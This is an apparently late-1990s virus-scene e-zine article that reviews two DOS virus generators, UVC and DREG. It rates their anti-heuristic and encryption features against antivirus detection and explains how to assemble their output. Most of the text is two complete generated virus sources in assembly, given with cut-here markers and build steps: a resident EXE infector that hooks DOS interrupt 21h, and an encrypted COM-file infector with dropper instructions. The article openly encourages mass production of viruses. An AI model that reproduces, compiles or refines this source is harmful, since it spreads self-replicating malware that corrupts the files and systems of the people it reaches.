                ---| SOK -3 Power Without Knowledge |---

                           In The Beginning

A look a two new virus generators

        1.  UVC   - Unknown Virus Creator from Unknown3 of LT/RSA
        2.  Dreg  - DHA Randomized Encryption Generator

Both of these virus generators are in their Beta stage of life with DREG being
in it's public beta testing.

                                      UVC
Features - GUI - No
           COM - No
           EXE - Yes
           TSR - Yes
         CRYPT - No
          POLY - No
       PAYLOAD - No
     ANTI-HEUR - YES *

* Anti-Heuristics used make the virus source code look like hell and hard to
modify.  See inclosed sample for details

PRO's  Easy to use and fast.
       Code is difficult to follow, means some av software won't be able to
        follow it as well.
       No GUI means that it should work on almost any platform that will run
        a dos based program.
CON's  Compiling instructions not in asm files.
       Code is difficult to follow, makes the code hard to understand and a
        pain to modify to fit your needs.
       No documentation included


It is as easy to use as it gets, type in UVC X x=# of viruses and UVC is off
to the races.  It takes pretty much no time at all to spit out the source code
named by generation, v0.asm v1.asm etc... All that's left is compiling the
viruses which isn't in the header of the source code.  TASM /m v0 then TLINK v0
followed by EXE2BIN v0.exe v0.com and your done.  A little batch file
programming will come in handy if your planning doing mass quantities of KAOS.


                                      DREG

Features - GUI - Yes/Ansi
           COM - Yes
           EXE - No
           TSR - No
         CRYPT - Yes
          POLY - No
       PAYLOAD - NO
     ANTI-HEUR - YES *

* Encryption itself is a form of anti-heuristics along with de-bugger traps 
and other pitfalls.

PRO's  Easy to use.
       Code is easy to follow thus making modifications pretty straight
        forward.
       Documentation makes it easy to figure out what goes into each block of
        the template questionnaire.
       Default values for each of the blocks in the template are
        automagically assigned for those who only know what the Enter key is.
       Automatically compiles if tasm/tlink/rtm files are in the path.

CON's  Requires you to make a stubb file along with figuring out how to
        combine the stubb and the dropper itself.
       Code is easy to follow, making it easy for av'rs to follow it as well,
        however the encryption should make this difficult for the av'rs
       GUI interface may not be compatible under all dos platforms (although
        it did work fine under NT4.0)
       Only does com files and com files are getting more and more rare.

Almost as easy to use as UVC, requiring only that you have to be smart enough
to hit the enter key more than once.  The included doc file goes a long way
in helping to figure things out, but damn that legalese at the end is long :)
The source code itself is easy to follow or so much as following someone
else's code can be.  Commenting the source would be nice additional feature
for further releases so that the beginner could have some clue of what's
going on.


                                In The End

  Both of these programs are a good start on a virus generator with each
having it's strength and weaknesses.  Both of these programs appear to be based
on 1 virus and mutating that 1 virus.  UVC is great since it's EXE/TSR but it
wont take long for AV companies to pin it down.  DREG is good because of the
encryption, but is very limited since it isn't TSR and doesn't handle EXE files.
Given that both are in an early BETA we can only hope that the weaknesses are
addressed before final public release.  It would be nice to see someone
making these things support A86 since it's readily available and at least as
capable if not more so than TASM
  I tried to get in touch with both authors, meeting with only partial success.
Unknown got a chance to look at this article and his comment was this "You are
to kind to me".  Gothmog if you happen across this drop me some email will !

                                SAMPLE CODE

========================== UVC Source Start Cutting =========================
; Created with UVC 1.00
; (c) 1997 Unknown/Executioner
.model  tiny
.386
v_length equ    v_finish-v_start
m_length equ    m_finish-v_start
num_para equ    (m_length+15)/16
cseg    segment use16
        org     0
        assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
v_start:
v_entry:
        call    delta
delta:
        pop     bp
        sub     bp, offset delta
        mov     ax, 428dh
        int     21h
        push    ax
        neg     ax
        push    ax
        dec     ax
        push    ax
        sub     ax, ((-1234)-1)
        pop     ax
        pop     ax
        pop     ax
        jz      return_to_host
        call    go_resident
return_to_host:
        mov     ax, ds
        add     ax, 10h
        add     word ptr cs:[bp+old_cs], ax
        add     word ptr cs:[bp+old_ss], ax
        mov     ss, word ptr cs:[bp+old_ss]
        mov     sp, word ptr cs:[bp+old_sp]
        db      0eah
old_ip  dw      0
old_cs  dw      0fff0h
old_ss  dw      0fff0h
old_sp  dw      2000h
go_resident:
        push    ds
        push    es
        mov     ax, ds
        dec     ax
        mov     ds, ax
        sub     word ptr ds:[3], num_para+1
        sub     word ptr ds:[12h], num_para+1
        mov     byte ptr ds:[0], 'Z'
        mov     ax, word ptr ds:[12h]
        mov     ds, ax
        mov     byte ptr ds:[0], 'Z'
        mov     word ptr ds:[1], (((((8-0ef1ah) xor 07cdh) xor 0d812h)+22f5h) xor 0e209h) and 0ffffh
        xor     word ptr ds:[1], 0e209h
        sub     word ptr ds:[1], 22f5h
        xor     word ptr ds:[1], 0d812h
        xor     word ptr ds:[1], 07cdh
        add     word ptr ds:[1], 0ef1ah
        mov     word ptr ds:[3], num_para
        inc     ax
        mov     es, ax
        push    cs
        pop     ds
        lea     si, [bp+v_start]
        mov     di, (0+6a53h) and 0ffffh
        sub     di, 6a53h
        mov     cx, (v_length+1)/2
        rep     movsw
        mov     ax, ((((0-0bbe1h)+0bd2fh)+6e99h) xor 5a94h) and 0ffffh
        xor     ax, 5a94h
        sub     ax, 6e99h
        sub     ax, 0bd2fh
        add     ax, 0bbe1h
        mov     ds, ax
        push    ds
        lds     dx, dword ptr ds:[84h]
        mov     word ptr es:[old_int21], dx
        mov     word ptr es:[old_int21+2], ds
        pop     ds
        cli
        mov     word ptr ds:[84h], offset new_int21
        mov     word ptr ds:[86h], es
        sti
        pop     es
        pop     ds
        retn
infect_file:
        pusha
        push    ds
        push    es
        mov     ax, (((((3d02h xor 6ddfh) xor 1a9bh) xor 9d97h)-0aafch) xor 0ee60h) and 0ffffh
        xor     ax, 0ee60h
        add     ax, 0aafch
        xor     ax, 9d97h
        xor     ax, 1a9bh
        xor     ax, 6ddfh
        int     21h
        push    bx
        push    ax
        pop     bx
        pop     ax
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     ax, 3f00h and 0ffffh
        mov     cx, ((((20h+0ea4fh) xor 700eh) xor 0ee41h)-9d92h) and 0ffffh
        add     cx, 9d92h
        xor     cx, 0ee41h
        xor     cx, 700eh
        sub     cx, 0ea4fh
        mov     dx, offset buffer
        int     21h
        cmp     word ptr ds:[buffer+10h], 2000h
        jz      already_infected
        mov     si, offset buffer+14h
        mov     di, offset old_ip
        push    ax
        mov     ax, word ptr ds:[si]
        add     si, 2
        mov     word ptr es:[di], ax
        add     di, 2
        pop     ax
        push    ax
        mov     ax, word ptr ds:[si]
        add     si, 2
        mov     word ptr es:[di], ax
        add     di, 2
        pop     ax
        mov     si, offset buffer+0eh
        movsb
        movsb
        push    ax
        mov     ax, word ptr ds:[si]
        add     si, 2
        mov     word ptr es:[di], ax
        add     di, 2
        pop     ax
        mov     ax, ((((4202h+0c66eh) xor 0bc54h) xor 8e41h)-0f8e8h) and 0ffffh
        add     ax, 0f8e8h
        xor     ax, 8e41h
        xor     ax, 0bc54h
        sub     ax, 0c66eh
        sub     cx, cx
        push    0
        pop     dx
        int     21h
        push    ax
        pop     cx
        and     cx, 0fh
        shr     ax, 3
        shr     ax, 1
        shl     dx, 2
        shl     dx, 8
        shl     dx, 2
        or      ax, dx
        sub     ax, word ptr [buffer+8]
        mov     word ptr [buffer+14h], cx
        mov     word ptr [buffer+16h], ax
        mov     word ptr [buffer+0eh], ax
        mov     word ptr [buffer+10h], 2000h
        mov     ax, 4000h and 0ffffh
        mov     cx, v_length
        and     dx, 0
        int     21h
        mov     ax, ((4202h+9252h)+0a093h) and 0ffffh
        sub     ax, 0a093h
        sub     ax, 9252h
        push    0
        pop     cx
        push    0
        pop     dx
        int     21h
        mov     cx, ax
        and     cx, 1ffh
        shr     ax, 6
        shr     ax, 3
        shl     dx, 4
        shl     dx, 3
        or      ax, dx
        or      cx, cx
        jz      multiple_of_512
        inc     ax
multiple_of_512:
        mov     word ptr [buffer+2], cx
        mov     word ptr [buffer+4], ax
        mov     ax, (((4200h+6a78h)+0a54dh) xor 0a767h) and 0ffffh
        xor     ax, 0a767h
        sub     ax, 0a54dh
        sub     ax, 6a78h
        push    0
        pop     cx
        xor     dx, dx
        int     21h
        mov     ax, ((((((4000h xor 0ac4eh) xor 1802h)+432ch)-0df81h) xor 1a6ah) xor 0d5abh) and 0ffffh
        xor     ax, 0d5abh
        xor     ax, 1a6ah
        add     ax, 0df81h
        sub     ax, 432ch
        xor     ax, 1802h
        xor     ax, 0ac4eh
        mov     cx, ((((((20h xor 9574h)+0b6e1h)-94dfh)-8202h) xor 1947h) xor 0e4ebh) and 0ffffh
        xor     cx, 0e4ebh
        xor     cx, 1947h
        add     cx, 8202h
        add     cx, 94dfh
        sub     cx, 0b6e1h
        xor     cx, 9574h
        mov     dx, offset buffer
        int     21h
already_infected:
        mov     ax, (((((3e00h+0a9c1h) xor 1d33h) xor 8d76h) xor 0ef12h) xor 4ac2h) and 0ffffh
        xor     ax, 4ac2h
        xor     ax, 0ef12h
        xor     ax, 8d76h
        xor     ax, 1d33h
        sub     ax, 0a9c1h
        int     21h
        pop     es
        pop     ds
        popa
        jmp     do_orig_int
residency_check:
        mov     ax, ((1234h xor 0bbf3h)+0eb73h) and 0ffffh
        sub     ax, 0eb73h
        xor     ax, 0bbf3h
        popf
        iret
new_int21:
        pushf
        push    ax
        inc     ax
        push    ax
        sub     ax, (4b00h+1)
        pop     ax
        pop     ax
        jz      infect_file
        push    ax
        neg     ax
        push    ax
        xor     ax, 782dh
        cmp     ax, ((-428dh) xor 782dh)
        pop     ax
        pop     ax
        jz      residency_check
do_orig_int:
        popf
        jmp     dword ptr cs:[old_int21]
v_finish:
old_int21 dd    ?
buffer  db      20h dup (0)
m_finish:
cseg    ends
        end     v_start
========================== UVC Source End Stop Cutting =======================

The following is the sample DREG source that I generated using all the
defaults with the Exception of the Virus Name and Author.

========================== DREG Source Start Cutting =========================
; --                --Ŀ
;  DREG0001.ASM                    By Gothmog -=- Digital Hackers' Alliance |
;  Created Using DHA's Randmomized Encryption Generator        [DREG] v0.1
; --
;                                askee!korpse!basic
;     < s ss$$$, s$ss  .,ss$$$, s$ss s$$$'  .,ss$$$, ,$$$ss, >
;         ssssss$$$$ ssss s$$$' $$$$ sssss$$$$ss  s$$$' $$$$ $$$$
;         $$$$  $$$$ $$$$ $$$$ss$$$$ $$$$ $$$$    ssssss$$$$ $$$$
;      .'$$$$  $$$$ $$$$ ssss  $$$$ $$$$ $$$$    $$$$  $$$ $$$$  sssss'.
;      `. $$$$  $$$$ $$$$ $$$$  $$$$ $$$$ $$$$ '$$$$$  $   $$$$  $$$$  .`
;         $$$$  $$$  S$s$$$$  $$$  S$s S$s   S$s     $$$  $$$$
;  < $$$$  $  $$$$  $  $  $$$$ >
;  S$s  S$s  s$S Ŀ
;  D i G i T a L  H a C K E R S '  A L L i A N C E    [DHA] 1 9 9 7 [DHA]  
;             ______    ____     ________                
;  /\-_.    __\_    `\/`   /`_ _`\__     `\   ._-/\    DHA RoCKiN' THe 2o3  
;  --__ ` /`    /'   /     `  `\    `\    /`\`__--     DHA GOiN' WoRLDWiDE  
;  --__ /`    /`   /'    /`   /' /`  '  /' /' __--     DHA HPAVCC KNoWLDGE  
;   /\_ `\_______/'\___/____/'\_______/' /'gd_/\       DHA oNLY THe BeST!  
;      `'- \______\/____\____\/_______\/' -'`            
;  o N L Y  T H e  F i N e S T  S i N C E  1 9 9 1    [DHA] 1 9 9 7 [DHA]  
; 
;
; Virus Name: sok3-t1                                         (c) 1997 Armand
; Build Date: 4-May-97                                        Junk Level: 48%
;
; Assumes TASM v4.00 or v5.00; other assemblers might work, but are in no way
; personally tested or quality assured.
;
; Assemble with: tasm /m3 dreg0001.asm
;                tlink /t dreg0001.obj
;
; The compiled code must be attached to a four-byte `stub' file consisting of
; the following bytes: EBh 02h 90h 90h. This is necessary to create a `dummy'
; infected file, otherwise the dropper will not function properly.

.model tiny
.code
        org     100h

start_virus:
                db      0BDh
delta_offset    dw      0004h

setup:
        lea     cx, [bp+decrypt]
        call    cx

start_encrypt:
        mov     al, 0F6h
        mov     ah, 6Ch
        xor     ax, 59D2h
        int     21h
        mov     word ptr [ip_24 + bp], bx
        mov     word ptr [cs_24 + bp], es

kill_tbclean:
        cli
        neg     sp
        neg     sp
        sti

set_int24_handler:
        lea     dx, [int24_handler + bp]
        mov     ax, 8D4Dh
        sub     ax, 1FF8h
        xor     ax, 4871h
        int     21h

        push    ds
        pop     es

restore_host_file:
        lea     si, [storage_bytes + bp]
        mov     di, 5E5Ch
        sub     di, 5D5Ch
        movsw
        movsw

set_dta:
        mov     ah, 2Eh
        xor     ah, 0CAh
        sub     ah, 11h
        xor     ah, 0C9h
        lea     dx, [end_virus + bp]
        int     21h
        jmp     find_some_files

virus_name      db      '[sok3-t1]', 00h
virus_author    db      'Armand', 00h

jungle_world:
        jmp     no_more_files

storage_bytes   db      0CDh, 20h, 90h, 90h

int24_handler:
        mov     al, 7Fh
        sub     al, 7Ch
        iret

find_some_files:
        mov     cx, 0FBCAh
        xor     cx, 0FBCDh
        mov     ah, 4Eh
        lea     dx, [file_mask + bp]

find_file:
        int     21h
        jc      jungle_world

        mov     al, 0FEh
        sub     al, 49h
        xor     al, 6Dh
        sub     al, 55h
        xor     al, 0E1h
        xor     al, 62h
        mov     ah, 3Dh
        lea     dx, [end_virus + 1Eh + bp]
        int     21h

        lea     dx, [storage_bytes + bp]
        mov     cx, 04h
        xchg    bx, ax

        mov     ah, 0F7h
        xor     ah, 0C8h
        int     21h

        cmp     word ptr [storage_bytes + bp], 'MZ'
        je      wind_it_up

        cmp     word ptr [storage_bytes + bp], 'ZM'
        je      wind_it_up

        cmp     byte ptr [storage_bytes + bp + 3], 90h
        je      wind_it_up

        jmp     start_the_dance

wind_it_up:
        call    close_file

dreg_marker     db      '[DREG]', 00h

start_the_dance:
        lea     si, [end_virus + 15h + bp]
        lea     di, [f_attr + bp]
        mov     cx, 0DA6h
        add     cx, 80E9h
        xor     cx, 8E86h
        rep     movsb

        mov     ah, 3Eh
        int     21h

        mov     al, 0B1h
        mov     ah, 0DEh
        sub     ah, 0AFh
        add     ah, 87h
        sub     ah, 3Bh
        xor     ah, 6Fh
        xor     ah, 90h
        add     ah, 48h
        xor     ah, 0A1h
        add     ah, 6Bh
        xor     ah, 9Bh
        xor     ax, 0B2CAh
        sub     ax, 0AE7Ah
        lea     dx, [end_virus + 1Eh + bp]
        mov     ch, 2Fh
        xor     ch, 0F7h
        sub     ch, 0D1h
        add     ch, 86h
        xor     ch, 14h
        sub     ch, 84h
        add     ch, 19h
        add     ch, 0CEh
        xor     ch, 1Bh
        sub     ch, 0A1h
        sub     ch, 2Dh
        mov     cl, 75h
        add     cl, 83h
        xor     cl, 60h
        sub     cx, 1998h
        int     21h

        lea     dx, [end_virus + 1Eh + bp]
        mov     ah, 0DCh
        sub     ah, 9Fh
        mov     al, 02h
        int     21h
        push    ax
        pop     bx

key_generators:
        call    rnd_key
        call    rnd_key
        pop     word ptr [offset key01 + bp]
        sub     word ptr [offset key01 + bp], 0BDC1h
        pop     word ptr [offset key02 + bp]
        add     word ptr [offset key02 + bp], 0D9D3h
        call    rnd_key
        call    rnd_key
        pop     word ptr [offset key03 + bp]
        sub     byte ptr[offset key03 + 1 + bp], 42h
        pop     word ptr [offset key04 + bp]
        sub     byte ptr[offset key04 + 1 + bp], 33h
        call    rnd_key
        pop     word ptr [offset key05 + bp]
        add     byte ptr[offset key05 + 1 + bp], 6Bh
        call    rnd_key
        call    rnd_key
        call    rnd_key
        pop     word ptr [offset key06 + bp]
        sub     byte ptr[offset key06 + bp], 18h
        pop     word ptr [offset key07 + bp]
        xor     byte ptr[offset key07 + bp], 81h
        pop     word ptr [offset key08 + bp]
        sub     word ptr [offset key08 + bp], 0CC73h

fight_this_bollocks:
        mov     cx, offset end_infect_file - offset infect_file
        lea     si, [bp + infect_file]
        lea     di, [bp + end_virus + heap_data_length + 0DBh]
        rep     movsb

        lea     ax, [bp + end_virus + heap_data_length + 0DBh]
        call    ax

        mov     dx, word ptr [bp + f_date]
        mov     ax, 5701h
        mov     cx, word ptr [bp + f_time]
        int     21h

        mov     ah, 69h
        sub     ah, 39h
        xor     ah, 0Eh
        int     21h

        mov     cx, 0BA38h
        sub     cx, 0BA38h
        lea     dx, [end_virus + 1Eh + bp]
        mov     cl, byte ptr [f_attr + bp]
        mov     al, 01h
        mov     ah, 0F7h
        sub     ah, 98h
        xor     ah, 0E0h
        sub     ah, 7Ch
        int     21h

        jmp     no_more_files

close_file:
        mov     ah, 3Eh
        int     21h

find_next_file:
        mov     ah, 4Eh
        add     ah, 01h
        jmp     find_file

no_more_files:
        mov     dh, 0Bh
        mov     dl, 0F0h
        xor     dl, 0C6h
        add     dl, 92h
        xor     dl, 0EBh
        add     dl, 20h
        sub     dl, 18h
        xor     dx, 4C3Ah
        xor     dx, 4791h
        mov     ah, 1Ah
        int     21h

restore_to_host:
        mov     di, word ptr cs:[cs_24 + bp]
        mov     ds, di
        mov     dx, word ptr cs:[ip_24 + bp]
        mov     al, 0Ch
        xor     al, 0F9h
        sub     al, 51h
        xor     al, 0E9h
        add     al, 1Fh
        sub     al, 50h
        add     al, 0CDh
        xor     al, 0CDh
        mov     ah, 25h
        int     21h

        push    es
        pop     ds

        mov     di, 0100h
        push    di

        ret

infect_file:
        lea     dx, [bp + encrypt]
        call    dx

        mov     dx, 00h
        mov     ax, 4202h
        sub     cx, cx
        int     21h

        mov     word ptr [delta_offset + bp], ax

        sub     ax, 03h
        mov     word ptr [jump_bytes + bp + 1], ax

        lea     dx, [start_virus + bp]
        mov     ah, 40h
        mov     cx, offset end_virus - offset start_virus
        inc     cx
        inc     cx
        inc     cx
        int     21h

        mov     ax, 4200h
        mov     dx, 3A32h
        xor     dx, 85EAh
        add     dx, 2ABFh
        xor     dx, 0EA97h
        xor     cx, cx
        int     21h

        mov     ah, 40h
        lea     dx, [jump_bytes + bp]
        mov     cl, 41h
        mov     ch, 24h
        add     ch, 04h
        add     ch, 6Ch
        sub     cx, 943Dh
        int     21h

        lea     ax, [bp + encrypt]
        call    ax

        ret

end_infect_file:

file_mask       db      '*.coM',0

end_encrypt     equ     $ - 0001h

jump_bytes      db      0E9h,00h,00h,90h

key01           dw      0000h
key02           dw      0000h
key03           dw      0000h
key04           dw      0000h
key05           dw      0000h
key06           dw      0000h
key07           dw      0000h
key08           dw      0000h

rnd_key:
        mov     ax, 11F6h
        add     ax, 2DF0h
        xor     ax, 0E722h
        xor     ax, 0F488h
        int     21h
        pop     di
        push    dx
        push    di
        ret

encrypt:
decrypt:
        lea     si, [bp + offset start_encrypt]
        mov     cx, (end_encrypt - start_encrypt + 1) / 2
        mov     di, si

xor_loop:
        lodsw
        jmp     false_jump

false_jump_2:
        stosw
        loop    xor_loop
        ret

false_jump:
        xor     ax, [key01 + bp]
        xor     ax, [key02 + bp]
        clc
        jnc     false_jump_2

end_virus:

ip_24           dw      ?
cs_24           dw      ?
f_attr          db      ?
f_time          dw      ?
f_date          dw      ?
f_size          dd      ?

heap_data_length        equ     $ - offset end_virus

        end     start_virus
========================== DREG Source End Stop Cutting ======================
